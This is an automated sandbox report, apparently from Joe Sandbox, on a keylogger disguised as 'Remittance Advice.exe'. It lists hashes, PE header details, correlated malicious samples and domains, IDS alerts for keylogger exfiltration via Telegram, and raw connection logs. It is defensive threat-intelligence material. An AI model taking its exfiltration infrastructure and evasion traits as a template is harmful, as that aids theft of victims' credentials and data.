                                                                    31898ORACLE-BMC-31898USfalse
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1589988
                                                                    Start date and time:2025-01-13 13:04:11 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 7m 42s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:9
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Remittance Advice.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 25
                                                                    • Number of non-executed functions: 1
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 2.23.242.162, 52.149.20.212
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    TimeTypeDescription
                                                                    07:05:37API Interceptor10033464x Sleep call for process: RegAsm.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    149.154.167.220PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                          https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                            6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                              Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                      h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        104.21.32.124010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                        • b2csa.icu/PL341/index.php
                                                                                        bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rafconstrutora.online/sa6l/
                                                                                        BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.aziziyeescortg.xyz/2pcx/
                                                                                        25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.masterqq.pro/3vdc/
                                                                                        QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.mzkd6gp5.top/3u0p/
                                                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • redroomaudio.com/administrator/index.php
                                                                                        193.122.130.0h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        reallyfreegeoip.orgPDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.32.1
                                                                                        FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.80.1
                                                                                        QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.80.1
                                                                                        Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.64.1
                                                                                        Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.16.1
                                                                                        aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.112.1
                                                                                        gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.48.1
                                                                                        h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        checkip.dyndns.comPDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 132.226.8.169
                                                                                        FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 158.101.44.242
                                                                                        QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 132.226.247.73
                                                                                        Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 132.226.247.73
                                                                                        Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 158.101.44.242
                                                                                        mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 193.122.6.168
                                                                                        aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 158.101.44.242
                                                                                        gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        api.telegram.orgPDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                        • 149.154.167.220
                                                                                        Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 149.154.167.220
                                                                                        nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                        • 149.154.167.220
                                                                                        h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TELEGRAMRUPDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                        • 149.154.167.99
                                                                                        http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.99
                                                                                        http://www.eghwr.icu/Get hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.99
                                                                                        https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                                                        • 149.154.170.96
                                                                                        https://telegramerong.cc/app/Get hashmaliciousTelegram PhisherBrowse
                                                                                        • 149.154.167.99
                                                                                        https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        http://telegramerong.cc/appGet hashmaliciousTelegram PhisherBrowse
                                                                                        • 149.154.167.99
                                                                                        ORACLE-BMC-31898USSOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 158.101.44.242
                                                                                        FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 158.101.44.242
                                                                                        trow.exeGet hashmaliciousUnknownBrowse
                                                                                        • 147.154.3.56
                                                                                        nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 158.101.44.242
                                                                                        mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 193.122.6.168
                                                                                        aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 158.101.44.242
                                                                                        gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 193.122.6.168
                                                                                        ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 193.122.6.168
                                                                                        h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 193.122.130.0
                                                                                        x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 193.122.130.0
                                                                                        CLOUDFLARENETUShttps://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20linkGet hashmaliciousUnknownBrowse
                                                                                        • 104.19.132.76
                                                                                        PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.32.1
                                                                                        https://smartbooking.ma/Get hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.80.1
                                                                                        https://connexion-pro.support/adobe/s/assets/Get hashmaliciousUnknownBrowse
                                                                                        • 104.21.11.138
                                                                                        rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.74.152
                                                                                        g5.elfGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        http://aeromorning.comGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.4.102
                                                                                        https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 172.68.1.238
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        54328bd36c14bd82ddaa0c04b25ed9adSOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.32.1
                                                                                        PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.32.1
                                                                                        FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.32.1
                                                                                        QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.32.1
                                                                                        Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.32.1
                                                                                        Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        Loader.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.32.1
                                                                                        mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.32.1
                                                                                        aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.32.1
                                                                                        gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.32.1
                                                                                        3b5074b1b5d032e5620f69f9f700ff0ehttps://email.mg.decisiontime.online/c/eJxszjFvszAQgOFfYzbQ-c4mMHj4pK_M3TqDOZdTjR1hJyj_vkqVMeujd3hXZxnHi2_Y6Qv1hohgaHifJbbhyHu75n2W5M7z7Fb2UiSnKjt3OUVJ_CqjpJ9WVoeoxwEvL62PKz9VN5szGsd5AQoLgV-oZ2_1oPuFgrWAvWnEIaAFDaM2ZGHoAsy0DGwY2VpNoAzs328fottqvRZF_xROCqeyFV_flQonDLPC6c6HhEfr8_q0v9vmcB9xlsTdl8SS0__8qQyUfKsbH6ket1K7rfgkXeLa3B3-BgAA__-9dmXGGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20linkGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        wuknbFMdeq.exeGet hashmaliciousFunkLockerBrowse
                                                                                        • 149.154.167.220
                                                                                        rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        No context
                                                                                        Process:C:\Users\user\Desktop\Remittance Advice.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1119
                                                                                        Entropy (8bit):5.345080863654519
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                        MD5:88593431AEF401417595E7A00FE86E5F
                                                                                        SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                        SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                        SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                        Malicious:true
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.742494265751586
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:Remittance Advice.exe
                                                                                        File size:205'312 bytes
                                                                                        MD5:667efc5a5ac024a15ce73a7a352ea598
                                                                                        SHA1:8b040298902662570d584fc468c8f45f35c47396
                                                                                        SHA256:98bd32336d5f7ccc755b7957803a881a51dafb9efad7d577befc431690469787
                                                                                        SHA512:1f1ceafe3eefd26ce784da5fcc56e81d47be172001b6ea27daeb6d6a6149f77492e6c8c50b4f70815cd0f96856d78660f8c0612c5f8d236ba1ce5dd6fe5af7bb
                                                                                        SSDEEP:3072:uXjI4IweUBbWrT1KS2pgGjfdF3vUcroEJEJ2WTi5Jg/N2FF:uTI6evHugGjfd1vUqofJ2fg
                                                                                        TLSH:DC14F5A017B67E35D9947F3EAE6601DE3A5D38E37039EEADFE485006CA402B4B51436C
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ZA................0..............7... ...@....@.. ....................................@................................
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x43371e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x827F415A [Thu May 19 00:31:22 2039 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x336c40x57.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x586.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x317240x31800894a8b2d6e54b607ab503a75b6eecf14False0.6826221196338383data7.769247848670264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x340000x5860x6004713da45945b2a2056b5d5a9c5d1b92aFalse0.412109375data4.008929408222653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x360000xc0x2006f6bb9996e1bcbc53f04faf30c5d7cb1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0x340a00x2fcdata0.43324607329842935
                                                                                        RT_MANIFEST0x3439c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2025-01-13T13:05:31.839208+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749707193.122.130.080TCP
                                                                                        2025-01-13T13:05:38.057995+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749707193.122.130.080TCP
                                                                                        2025-01-13T13:05:38.767563+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749712149.154.167.220443TCP
                                                                                        2025-01-13T13:05:39.008817+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749712149.154.167.220443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 13, 2025 13:05:29.973512888 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:05:29.978420019 CET8049707193.122.130.0192.168.2.7
                                                                                        Jan 13, 2025 13:05:29.978483915 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:05:29.978723049 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:05:29.983549118 CET8049707193.122.130.0192.168.2.7
                                                                                        Jan 13, 2025 13:05:31.265414000 CET8049707193.122.130.0192.168.2.7
                                                                                        Jan 13, 2025 13:05:31.307892084 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:05:31.694056034 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:05:31.698842049 CET8049707193.122.130.0192.168.2.7
                                                                                        Jan 13, 2025 13:05:31.795027971 CET8049707193.122.130.0192.168.2.7
                                                                                        Jan 13, 2025 13:05:31.830347061 CET49708443192.168.2.7104.21.32.1
                                                                                        Jan 13, 2025 13:05:31.830374002 CET44349708104.21.32.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:31.830436945 CET49708443192.168.2.7104.21.32.1
                                                                                        Jan 13, 2025 13:05:31.839207888 CET4970780192.168.2.7193.122.130.0
                                                                                        Jan 13, 2025 13:05:31.842214108 CET49708443192.168.2.7104.21.32.1
                                                                                        Jan 13, 2025 13:05:31.842235088 CET44349708104.21.32.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:32.324018955 CET44349708104.21.32.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:32.324098110 CET49708443192.168.2.7104.21.32.1
                                                                                        Jan 13, 2025 13:05:32.328825951 CET49708443192.168.2.7104.21.32.1
                                                                                        Jan 13, 2025 13:05:32.328835964 CET44349708104.21.32.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:32.329190969 CET44349708104.21.32.1192.168.2.7
                                                                                        Jan 13, 2025 13:05:32.370403051 CET49708443192.168.2.7104.21.32.1
                                                                                        Jan 13, 2025 13:05:32.382970095 CET49708443192.168.2.7104.21.32.1
